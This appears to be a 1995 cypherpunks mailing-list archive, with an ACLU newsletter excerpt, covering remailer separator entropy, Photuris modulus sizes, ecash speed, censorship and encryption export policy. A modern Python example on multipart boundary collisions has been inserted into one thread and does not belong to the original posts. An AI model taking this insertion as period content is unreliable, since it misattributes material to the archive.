*  John Perry Barlow Launches Cyberspace Lecture Series Co-Sponsored by the
ACLU of Washington

The ACLU of Washington began a series of talks in Seattle to explore the
impact and implications of the technology revolution on art and culture.
 John Perry Barlow, former Grateful Dead lyricist and co-founder of the
Electronic Frontier Foundation, launched the series on November 3rd.
 "Cyberspace is largely about conversation that ultimately could include
everybody on the planet . . . . Cyberspace can be the greatest venue for
freedom of expression humans have ever had," said Barlow.  Barlow talked of
the spiritual dimension of cyberspace, which he sees as an egalitarian
ecosystem with the potential to link "every synapse on the planet."  For him
cyberspace must be a place where anybody can say anything they think without
fear of reprisal.  But he tempered his lyrical vision of cyberculture with a
warning of the dangers of censorship from elected officials who do not
appreciate -- or even understand -- how new forms of communication function.
 "When I visit Congress, I feel like Tom Paine in the Court of King George,"
Barlow quipped.

-----------------------------------------------------------------
*  ACLU-Georgetown University Law Center President Writes Articles on the
Marty Rimm controversy

Alan Lewine, President of the ACLU student chapter at GULC, has written a
series of articles for the Georgetown Law Weekly on the Georgetown Law
Journal's involvement in the controversial publication of Marty Rimm's
purported study of net porn. They are available at
http://www.tripod.com/userland/A/alewine/index.html

-----------------------------------------------------------------
CONFERENCES
-----------------------------------------------------------------
Nov 8, 6 pm: "Regulating the Internet: Should Pornography Have A Free Ride on
the Information Superhighway?"  Benjamin N. Cardozo School of Law, 55 Fifth
Avenue, New York, New York.  Panelists include Nadine Strossen, National
President, ACLU; Bill Burrington, Staff Counsel of the Electronic Frontier
Foundation; and Barbara Bennett Woodhouse, Professor of Law at University of
Pennsylvania Law School.  Sponsored by the Cardozo Arts & Entertainment Law
Journal.

Nov 16, 5 pm: Nadine Strossen (National President, ACLU) speaks on "Defending
Pornography: A Feminist Perspective on New Technologies and Old-Fashioned
Sex," GULC, 600 New Jersey NW, 12th Floor Ballroom, Gewirz Hall.
 Co-sponsored by ACLU-GULC and the Student Bar Association Speakers Fund.

-----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
-----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

-----------------------------------------------------------------
ONLINE RESOURCES FROM ACLU STATE AFFILIATES
-----------------------------------------------------------------
Florida:
ACLU of Pinellas County Florida
http://www.stpt.usf.edu/~greek/aclu.html

Illinois:
Illinois Civil Liberties Union
http://www.aclu-il.org/

Champaign County, Illinois ACLU Chapter
http://www.prairienet.org/cc-aclu/
(The chapter also maintains an Illinois Civil Liberties Alert List.  To
subscribe send a message to cla@prairienet.org)

Indiana:
Indiana Civil Liberties Union
http://www.inetdirect.net/iclu/

South Carolina:
ACLU of South Carolina
http://www.cris.com/~katrinan/aclu/index.html

-----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu@aclu.org with "subscribe Cyber-Liberties Update" in the subject line
of your message.  To terminate your subscription, send a message to
infoaclu@aclu.org with "unsubscribe Cyber-Liberties Update" in the subject
line.

For general information about the ACLU, write to infoaclu@aclu.org.
-----------------------------------------------------------------
**PLEASE REPOST WITH HEADER INTACT**




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 9 Nov 1995 10:44:36 +0800
To: Lance Cottrell <loki@obscura.com>
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511081943.LAA24863@kiwi.cs.berkeley.edu>
Message-ID: <199511090147.RAA31271@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I think you are fine if the odds of corrupting the message are less than 
> the odds of getting hit by a falling meteor while running the program. 
> In general there is little point in making any one part of the system 
> many orders of magnitude more reliable than any other part.

I agree entirely. That's why my PGP key at school is 382 bits. It's a
lot easier to compromise my machine than factor a 382 bit number.

So let me rephrase the question: what's the minimum number of entropy
bits that can be used and still give you that warm and fuzzy feeling
that you don't have to worry about the possibility that the message
might be corrupted?

The winning answer gets a free mention in the PGP/MIME Implementation
notes Web page: http://www.c2.org/~raph/impl.html

Raph
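
For the separator-length question in this thread, an added example (not code from premail or from any poster): a single-pass multipart writer with a random separator, the corruption a matching data line causes, the two-pass alternative, and the union bound that relates separator bits to lifetime risk. The function names, the "=-" prefix and the lifetime volume of 2**40 lines are assumptions made for illustration.

```python
import secrets
from fractions import Fraction


def collision_bound(bits, lines):
    """Upper bound on P(at least one of `lines` data lines matches a separator
    drawn uniformly from 2**bits values). Union bound: lines / 2**bits.
    Holds only if the data is fixed before the separator is drawn."""
    return min(Fraction(1), Fraction(lines, 2 ** bits))


def min_bits(lifetime_lines, log2_risk):
    """Smallest separator size whose bound over `lifetime_lines` lines of data
    is at most 2**log2_risk (log2_risk is a negative integer)."""
    ceil_log2 = (lifetime_lines - 1).bit_length()
    return max(0, ceil_log2 - log2_risk)


def make_boundary(bits=128):
    """Random separator; hex digits are all legal MIME boundary characters."""
    return "=-" + secrets.token_hex((bits + 7) // 8)


def is_delimiter(line, boundary):
    """Prefix match: any line starting with '--' + boundary is a delimiter."""
    return line.startswith("--" + boundary)


def write_multipart(parts, boundary):
    """Single pass: emit lines as the parts stream by, never rescanning them.
    Each part is an iterable of text lines; parts carry no headers here."""
    for part in parts:
        yield "--" + boundary
        yield ""                      # blank line ends the (empty) part headers
        yield from part
    yield "--" + boundary + "--"      # close delimiter


def split_multipart(lines, boundary):
    """Receiver side: cut the stream at every delimiter line."""
    parts, current = [], None
    for line in lines:
        if is_delimiter(line, boundary):
            if current is not None:
                parts.append(current[1:] if current[:1] == [""] else current)
            if line.startswith("--" + boundary + "--"):
                break
            current = []
        elif current is not None:
            current.append(line)
    return parts


def verified_boundary(parts, bits=32):
    """Two passes: draw a separator, scan all data, redraw on a match."""
    while True:
        boundary = make_boundary(bits)
        if not any(is_delimiter(l, boundary) for p in parts for l in p):
            return boundary


# Constructed data: the first part contains a line equal to a weak separator.
SAMPLE_PARTS = [["hello", "--sep", "tail"], ["second part"]]

if __name__ == "__main__":
    broken = split_multipart(write_multipart(SAMPLE_PARTS, "sep"), "sep")
    print("fixed separator 'sep':", broken)
    b = make_boundary(128)
    print("128-bit separator    :", split_multipart(write_multipart(SAMPLE_PARTS, b), b))
    # Assumed lifetime volume: 2**40 lines of data ever passed through the tool.
    for bits in (64, 128):
        print(bits, "bits -> lifetime bound", float(collision_bound(bits, 2 ** 40)))
    print("bits for a 2**-40 lifetime risk:", min_bits(2 ** 40, -40))
```

The bound covers accidental matches only; data supplied by someone who has already seen the separator is outside it, and that case needs the two-pass check.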




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 9 Nov 1995 08:38:43 +0800
To: cypherpunks@toad.com
Subject: Cybercensor in Singapore
Message-ID: <199511081715.SAA19894@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, November 8, 1995, Editorial


Cyberspace in Singapore. The Internet Threat to Official
Censorship

"The Internet is like fire," Mr. Yeo said. "If you don't 
learn how to control it, it will burn you." In Singapore, 
a little democracy can be a dangerous thing.


Singapore. From his 37th-floor office overlooking
Singapore Strait, George Yeo can survey the oil
refineries and bustling dockyards that helped make
Singapore the trade and financial center of Southeast
Asia. But the view that interests the Minister of
Information and the Arts these days is not the vista
beyond his window. It is the image on the computer
terminal at his desk. Mr. Yeo, like the rest of
Singapore's top politicians, wants his country to be a
leader in the manufacture and use of computer technology
without relinquishing the Government's chokehold on the
dissemination of information in Singapore.

Singapore's effort to find a balance point will be
closely watched by other Asian countries that mix
capitalist economics with authoritarian politics. The
difficulty was underlined last week. Even as Mr. Yeo
worried about the perils of the Internet, the Government
announced it was relocating 500 industrial enterprises to
make room for the development of advanced electronics
manufacturing plants.

Contradictions like that abound in Singapore, a country
that eludes simple classification. With its gleaming
skyscrapers and shopping arcades, it can seem like Dallas
transplanted to the South China Sea. Conversely, the
dominance of one political party and the presence of a
paternalistic Government can make it feel like a remnant
of the Soviet bloc. Salman Rushdie's "Satanic Verses" and
Cosmopolitan magazine are banned, yet the city's largest
bookstore stocks a selection of contemporary literature
and the works of Chee Soon Juan, Singapore's opposition
leader.

Singapore's gaudy prosperity challenges the American
faith that individual liberty is essential for a vital
marketplace. George Yeo is the personification of that
challenge. Born in Singapore in 1954, educated at
Cambridge University and Harvard Business School, he is
disdainful of the cacophony and untidiness of American
democracy. Like Lee Kuan Yew, the architect and ruler of
modern Singapore, he believes the vulnerabilities of his
ethnically diverse city-state can be best handled by a
strong government that encourages a sense of community
and limits individual rights.

But controlling semiconductors is not the same as
controlling newspapers, television networks or political
opponents. With the aggressive use of libel and slander
statutes Singapore's leaders have intimidated the
newspapers that publish here, including The International
Herald Tribune. To control television broadcasting, the
Government has banned household use of satellite dishes.
Some political pluralism is permitted, but no one doubts
the primacy of Mr. Lee's People's Action Party.

Recognizing the risk of bottling up public demand for
foreign television broadcasts, Singapore's leaders are
wiring the country for cable television. That way viewers
will receive many more channels, including MTV, while the
Government will still be able to screen out programming
it finds objectionable. It is the quintessential
Singapore solution.

Singapore's approach to controlling cyberspace is equally
ingenious, but harder to enforce. Mr. Yeo, essentially,
hopes to control the Internet by embracing it. He is
encouraging use of the Internet by equipping schools with
computers, and establishing systems that allow
Singaporeans to link up with the computer network by
dialing a local phone number.

The catch is that the Government will be able to monitor
use of the Internet that goes through local servers, and
is already intervening to block material it considers
pornographic. The Government has blunted an uncensored
Internet forum on Singapore political life by assembling
a group of users who make sure the Government's views are
represented.

Mr. Yeo concedes that more sophisticated and affluent
users can outflank many of his defenses by dialing into
the Internet through foreign phone systems. His purpose,
he says, is to lay down markers for citizens, expecting
that most will abide by them. "The Internet is like
fire," he said. "If you don't learn how to control it, it
will burn you." In Singapore, a little democracy can be
a dangerous thing.

Philip Taubman

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Fri, 10 Nov 1995 03:04:09 +0800
To: cypherpunks@toad.com
Subject: [Sci-Fi] Re: expiration dates on cryptography
In-Reply-To: <acc62dde07021004cd59@[205.199.118.202]>
Message-ID: <9511081824.ZM25431@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


For methods of jiggering physical clocks, one might eventually reach the
stage of attempting to have physically unjiggable clocks. [Well, theoretically
unjiggable, just as our hideously huge composites are thought unfactorable
by computability arguments.]

Example:
I have a piece of information which I wish to remain secret until a well-
defined date in the future. I encrypt it then lob a package containing
the information into a well-defined and predictable trajectory which will
cause it to intersect the earth's trajectory at that time [or shortly
thereafter]. I would [guess, hope, no, I haven't sat here and calculated]
that there should exist possible systems where beyond an initial period of
about a week, there would be no earthly technology capable of catching
up with the packet.

Alright, so it's hideously expensive. But you could put a lot of information
into one packet. Apollo Assured Archiving could have fixed rates per megabyte,
with regular [monthly?] launches into reliable orbits. At which point the
joy becomes making sure there aren't packet-catching bases on the far
side of Mercury... [with the mind control lasers, of course]

frodo

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 10:47:32 +0800
To: "Kevin S. Van Horn" <cypherpunks@toad.com
Subject: This is an Architext Document: Read Carefully!
Message-ID: <acc69c7a11021004ca00@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:54 PM 11/8/95, Kevin S. Van Horn wrote:

>A small point of information.  I work for Architext, the company that provides
>the excite service.  We only keep the last two weeks of USENET news around,
>and don't keep any archives going further back than that.  USENET is just too
>damn huge for us to go to the trouble of keeping comprehensive archives around
>without good evidence of demand for it among our target audience.

Small world. "Architext" is also the hypertext program I use to cross-index
many articles. I'm surprised the new company, also called "Architext,"
picked a name which will increase confusion.

("Architext," BrainPower, Inc., Agoura Hills, CA.)

No Cypherpunks relevance, except to show how name collisions can occur.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 9 Nov 1995 08:33:11 +0800
To: karn@qualcomm.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511080146.RAA22568@servo.qualcomm.com>
Message-ID: <199511081833.TAA10801@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> Well, since we already require 56-bit DES in ESP in the interests of
> promoting basic interoperability, wouldn't a 512-bit prime be
> similarly sufficient?

*NO*, because you have to break the 56-bit DES separately every time,
whereas doing the precomputation for the 512 bit prime is a one-time
job.  Once anyone has done the precomputation, *all* communications
will be open to whoever is in possession of the database.

I think there is good reason to believe that if the 512 bit prime is
allowed, it will be widely used, and even if it is found breakable, it
will not be easily changed (just think about the experience with Sun's
"secure" rpc, and how quickly their primes have been changed - and it
still has much narrower deployment than what is hoped for ipsec).

Let me include below a message I sent to Bill Simpson.  

> If it is kept, the commercial vendors will probably start using it
> as default because it is faster than the others, and the state
> department will pressure them to do so.  Then we are again left with
> too weak protections (in other words, pseudo-security which makes
> people believe they have protection, when they actually don't).
> After the precomputation, it is apparently cheap enough to crack the
> exchange that it can be done on a mass scale to all exchanges
> between a very large number of hosts.  I find this very harmful, as
> it again provides no protection against mass surveillance.  We are
> already too close to an Orwellian society.

The remarks there apply equally well to organized criminals, large
corporations, and hostile governments.  Or, suppose some group manages
to get access to enough idle time, computes the database, and posts it
on the Internet.  I for one would be willing to contribute CPU time on
machines where I have access to help such a group, because I think it
is better that it is widely known and publicized when there is little
security and privacy.

Including the provision for the 512 bit prime is *HARMFUL* and
*DANGEROUS*.  Export control is not really an issue here, because if
companies in the United States cannot provide secure networking,
there are other companies in the world that can.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 14 Nov 1995 05:48:20 +0800
To: bal@martigny.ai.mit.edu
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511081704.JAA07274@qualcomm.com>
Message-ID: <199511090337.TAA04357@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>I don't know.  Maybe the right thing to do is require conforming
>implementations to support a large modulus but include recommended
>smaller moduli.  Then Alice can always force Bob to use the large
>modulus but, if both agree, they can use something smaller from the
>standard or even their own home-grown modulus.

Thanks. That's pretty much what we are doing -- requiring a particular
1024-bit modulus but recommending several others as options. There's a
2048 bit optional modulus and may even be a 4096-bit option if I can
find one in reasonable time. There was going to be a 512-bit optional
modulus but the group has reacted so strongly to it that I'm willing to
withdraw it.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 10 Nov 1995 08:12:29 +0800
To: cypherpunks@toad.com
Subject: Adm. William Studeman speaks about the CIA (fwd)
Message-ID: <Pine.SOL.3.91.951108193642.24896C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 08 Nov 95 17:24:55 CST
Subject: Adm. William Studeman speaks about the CIA

 
 
SAN ANTONIO -- Admiral William Studeman, Deputy Director, CIA spoke
to the San Antonio World Affairs Council on Wednesday (8 Nov).  He
covered the organization of the Central Intelligence Agency;
foreign intelligence;  the future of intelligence;  and went on to
state:
 
     "While the press is reporting a reduced need for intel-
     ligence..  President Clinton has signed an Executive Order
     increasing the level of intelligence collection to a level
     4..   A level 4 for example are countries like Somalia,
     Haiti, and Yugoslavia..  so the collection needs are much
     greater than ever before."
 
     "This administration now also requires that intelligence be
     turned over to law enforcement agencies;  which was never
     done before."
 
     [...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Thu, 9 Nov 1995 12:13:09 +0800
To: ylo@cs.hut.fi
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511081833.TAA10801@soikko.cs.hut.fi>
Message-ID: <199511090347.TAA04403@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>Including the provision for the 512 bit prime is *HARMFUL* and
>*DANGEROUS*.  Export control is not really an issue here, because if
>companies in the United States cannot provide secure networking,
>there are other companies in the world that can.

You've convinced me. I remove my proposal to include a recommended 512-bit
modulus. The smallest standard modulus will remain 1024-bits.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 9 Nov 1995 10:30:41 +0800
To: frank@funcom.no (Frank Andrew Stevenson)
Subject: Re: True Random (short c-source)
In-Reply-To: <Pine.SGI.3.91.951108165325.25592A-100000@odin>
Message-ID: <199511090111.UAA07637@homeport.org>
MIME-Version: 1.0
Content-Type: text


Frank Andrew Stevenson wrote:

| I have written a short random number generator which appears to produce
| reasonable random numbers even in DOS, at the heart of the code is the
| short function fGetRand, the amount of entropy derived from this

	What tests have you done on the output that causes you to say
the random numbers are 'reasonable'?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 9 Nov 1995 10:42:30 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: ecash speed
In-Reply-To: <199511082345.PAA02628@jobe.shell.portal.com>
Message-ID: <199511090130.UAA13562@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> The point is that if the anonymity afforded by ecash is too costly in
> terms of time, then we may end up stuck with a non-anonymous system
> simply because that is the only one efficient enough to work.  It would
> be good to find out if that is a serious problem.

I suspect that as CPU speed exponentiates this will become less and
less of a problem. It doesn't especially worry me.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Thu, 9 Nov 1995 13:10:46 +0800
To: adam@lighthouse.homeport.org
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090418.XAA07907@homeport.org>
Message-ID: <199511090454.UAA04547@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>You might want to offer a number of strong moduli in the 1024-1500 bit
>range.  Having multiple strong moduli in the same size (speed) range

We already have a secondary 1024-bit modulus in the spec. The question is
whether the problem is better solved by allowing parties to use private
moduli rather than by filling up the spec with additional moduli. Remember
that the original reason for specifying a particular modulus as "required"
is to guarantee some minimum degree of interoperability, not to meet every
possible threat.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Nov 1995 10:17:22 +0800
To: cypherpunks@toad.com
Subject: Re: ecash speed
In-Reply-To: <199511090130.UAA13562@jekyll.piermont.com>
Message-ID: <199511090508.VAA05884@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

>Hal writes:
>> The point is that if the anonymity afforded by ecash is too costly in
>> terms of time, then we may end up stuck with a non-anonymous system
>> simply because that is the only one efficient enough to work.  It would
>> be good to find out if that is a serious problem.

>I suspect that as CPU speed exponentiates this will become less and
>less of a problem. It doesn't especially worry me.

Consider, though, what happens in the current ecash system if it were
used to charge a penny per page.  You would click on a link in your web
browser to go to the new page.  It would send the GET request to the
remote server as usual.

The server would fire up a CGI script which will run the shop software.
That software will make a TCP stream connection back to your ecash wallet
software which is running on the system where your client is.  It sends a
request to get paid $.01.  Assuming the wallet is configured to
automatically approve such a payment, it will send a one penny coin to
the shop software along the opened link.  (This may also involve doing a
PK encryption on the coin as an anti-theft measure; this aspect of the
current ecash system is not documented AFAIK.)

The shop software then opens a TCP stream connection to the bank, and
forwards the coin there.  The bank receives it, and checks the public
key signature in the coin.  It then compares the coin against every other
coin which has ever been spent (within the validity period of the coin)
to make sure it is not being doubly spent.  If this all checks out it
sends back some authentication message to the original server.  The shop
software then delivers the new page to the client browser.

This all has to happen whenever you click on a link in your browser.
Even with fast CPU's I think the extra step of connecting to the bank,
having it check against all coins, and getting approval will be
considerable for each link traversal.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Nov 1995 11:14:09 +0800
To: cypherpunks@toad.com
Subject: Industry Group Rebuffs U.S. on Encryption
Message-ID: <199511090232.VAA00163@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, November 8, 1995. 


   Industry Group Rebuffs U.S. On Encryption

   By John Markoff


   The campaign by the Clinton Administration to create a
   standard for data encryption acceptable to industry, civil
   liberties and law enforcement groups broke down yesterday
   when a group including some of the nation's most powerful
   technology companies rejected a compromise proposal.

   The aim is to set a policy that meets the needs of
   electronic commerce as well as the concerns of the National
   Security Agency and other Federal offices that are opposed
   to the proliferation of data-coding software, feeling it
   will make it impossible for them to gather intelligence
   overseas.

   The Administration offered a compromise plan and had been
   seeking comment from the public. But the industry coalition
   said yesterday that it found the Government unwilling to
   compromise. Thus, the group of 37 companies said, it would
   formulate its own policy proposal to present to the White
   House and to Congress in the next six months.

   High-technology industries want a data-coding standard
   secure enough that both businesses and overseas customers
   could use it for sensitive financial and business
   correspondence. They seek a longer and more powerful
   encryption key than the Government is willing to grant, and
   object to Government demands that law enforcement agencies
   have "back-door" access to such transmissions that would
   allow them to intercept coded messages.

   The letter is signed by several of the country's leading
   computer, software and on-line companies, among them
   America Online, Apple Computer, AT&T, Eastman Kodak,
   I.B.M.'s Lotus Development division, MCI Communications,
   Microsoft, Novell, Oracle, Sybase and Tandem Computers.

   On Aug. 17, the Administration proposed a liberalization of
   export-control procedures for "key escrow" software
   products, or those providing law-enforcement access.

   "The current policy directive also does not address the
   need for immediate liberalization of current export
   restrictions," the letter said. "Such liberalization is
   vital to enable U.S. companies to export state-of-the-art
   software products during the potentially lengthy process of
   developing and adopting a comprehensive national
   cryptography policy."

   [End]

----------

   The Washington Post, November 8, 1995


   Encryption Control Plan Sparks Industry Protest

      High-Tech Groups Say Proposals Unworkable

   By Elizabeth Corcoran


   High-technology companies and advocacy groups are writing
   to Vice President Gore and House Speaker Newt Gingrich to
   protest what they contend are unworkable federal proposals
   for controlling the export of data scrambling technology.

   The letters deepen an industry-government rift that began
   only days after federal officials unveiled an outline of
   what they hoped would be a palatable plan at an industry
   meeting in August.

   Two separate coalitions are criticizing the
   administration's draft proposal, which the government
   circulated on the Internet on Monday.

   Current export regulations prohibit companies from sending
   overseas any encryption, or data-scrambling technology,
   that exceeds a certain degree of sophistication. The
   government argues that it needs to be able to peek at
   messages and files with proper court authorization -- to do
   its job of protecting U.S. citizens from terrorist groups
   and other malevolent organizations.

   In July, some French students demonstrated they could
   readily break the type of encryption technology that the
   U.S. government lets companies export. In August, the
   administration said it would let companies include more
   complex types of encryption, provided they pledged to
   entrust to an authorized agent a "spare key," or the means
   for unscrambling the information.

   Unlike early proposals in which the government said it
   would hold such keys, the administration is suggesting that
   companies and individuals would be able to select private
   keyholders, much the way people pick their banks.

   But after a brief honeymoon, industry and civil liberties
   groups began to find flaws with the details in the new
   proposals. This week's letters indicate that whatever
   fragile compromise the government had hoped it had found
   has grown even weaker.

   One coalition, pulled together by the Washington advocacy
   group Center for Democracy and Technology, includes about
   three dozen high-tech companies and associations. The group
   has promised to draft an alternative plan within six
   months.

   "There is a very serious message here: that national
   security can't be controlling the Internet," said Jerry
   Berman, executive director of the center. "There are other
   issues, global competitiveness and privacy, that need to be
   placed in the balance -- and the administration's policy
   doesn't do that."

   A second coalition of about 10 free-market and libertarian
   groups, led by another policy group, Americans for Tax
   Reform, plans to send their letter to Gingrich in the next
   day or two. The group contends the administration's
   encryption proposals are an encroachment on citizens' civil
   rights.

   The administration's proposals would not restrict the
   encryption technologies that people use within U.S.
   boundaries. But it would require that if they
   electronically send an encrypted message to parties outside
   the United States, a spare key must be stored with an
   authorized agency.

   "Even though we recognize [the administration] has worked
   hard on its proposals, it's not the right direction," said
   Rebecca Gould, director of policy at the Business Software
   Alliance, a trade association of software firms.

   "We've been in this [debate] since July 1994," she added,
   a long time for companies that churn out a new version of
   most products every 18 months. "That means lost sales for
   us and a loss of U.S. industry sales abroad."

   [End]

----------

Both slipped by gummed eyes, thx gnu.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 14 Nov 1995 08:04:22 +0800
To: cypherpunks@toad.com
Subject: REMINDER: PARTY! Nov. 18th, sponsored by Community ConneXion
Message-ID: <199511090615.WAA14726@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Subject: REMINDER: PARTY! Nov. 18th, sponsored by Community ConneXion

Here's a little reminder:
We're having a party in a little over a week. I hope you can make it.

	Community ConneXion: the Internet Privacy Provider is having a
party! We're partying to celebrate the spread of privacy on the net,
through the increased security of internet products, as well as the
growth of our services. (Many new services and new features on existing
services will likely be announced before the party. Stay tuned.)
	We're inviting all our customers and other potentially
interested parties, which includes you, if you've received this
note. So please join us, and send a copy of this invitation to anyone
else you may know who would be interested in attending.

Where: Icon Byte Bar & Grill
       299 9th Street (at Folsom)
       SF CA 94103
When:  Sat. Nov. 18 1995
       7:00 PM

	This is a good chance to meet and network with the people who
are making privacy on the internet a reality. Find out more about the
HackNetscape and HackMicrosoft contests. Learn about our specialized
web services, found nowhere else but at Community ConneXion. Hear
about the anonymous and pseudonymous servers here and what we're doing
to improve them.
	There will be catered snacks and a no-host bar.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 9 Nov 1995 14:54:27 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511082306.PAA24448@jobe.shell.portal.com>
Message-ID: <30A19E4E.348A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com wrote:
> After all, Netscape (and AT&T) have had, over THREE WEEKS to work on this
> problem or to make some form of public comment, and have done nothing, but
> put some of their programmers -- unofficially ... speaking for myself ...
> not speaking for the Company -- programmers on this list

  I was posting here before your supposed "flaw" was posted.  I have never
been told that I should or should not participate on this list by anyone
at netscape.

> Meanwhile people are having their PGP keyrings collected, their passwords
> monitored, and all of the information -- even information which they have
> NOT posted to Usenet, information that is simply on their personal hard
> drives, or on a private corporate network that is behind a firewall --
> collected by anyone who actually understands *how* to use Netscape
> Navigator's standard features to do it.

  Please show us some proof.  All you have done is post unfounded allegations
backed up by flawed logic and a misunderstanding of the technology.  Send me
a URL, and I will point my navigator at it.  If you can collect my PGP key ring
you can gloat here or anywhere else.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 9 Nov 1995 14:39:05 +0800
To: Raph Levien <loki@obscura.com>
Subject: Re: PGP Comment feature weakens remailer security
Message-ID: <199511090618.WAA21037@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:47 PM 11/8/95 -0800, Raph Levien wrote:
> So let me rephrase the question: what's the minimum number of entropy
> bits that can be used and still give you that warm and fuzzy feeling
> that you don't have to worry about the possibility that the message
> might be corrupted?

I guess that if a comet hits the earth and exterminates the human race
you would not be unduly worried by a corrupted message, so let us make
the odds equal to human civilization being destroyed on the same day.

We get roughly one massive extinction every hundred million years or
so, and a smaller blast that would demolish our technology every ten
million years or

So if the probability of an error was equal to the human race and most
major species being destroyed the same day, you would not be unduly 
worried.

Probability of human civilization and all large animals being wiped out
by comet impact tonight is 2.7E-11, so thirty five bits should be 
sufficient.

But, if you want to feel really comfortable, make it forty bits.

The probability of hitting a forty bit combination by chance is
equal to the probability that all large animals on earth will
be wiped out by comet impact in the next three quarters of an hour.

But you might have a million lines, and send a million messages,
each of a million lines.

So let us make the probability that one of those fails equal to
the chance that all large animals on earth get wiped out in the next
half hour.

Well in that case make it eighty bits.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 9 Nov 1995 12:32:28 +0800
To: karn@qualcomm.com (Phil Karn)
Subject: Re: Photuris Primality verification needed
In-Reply-To: <199511090337.TAA04357@servo.qualcomm.com>
Message-ID: <199511090418.XAA07907@homeport.org>
MIME-Version: 1.0
Content-Type: text


You might want to offer a number of strong moduli in the 1024-1500 bit
range.  Having multiple strong moduli in the same size (speed) range
reduces the value of going after a particular one.  We all know how
security software tends to stay deployed longer than it really should.

Adam

Phil Karn wrote:

| Thanks. That's pretty much what we are doing -- requiring a particular
| 1024-bit modulus but recommending several others as options. There's a
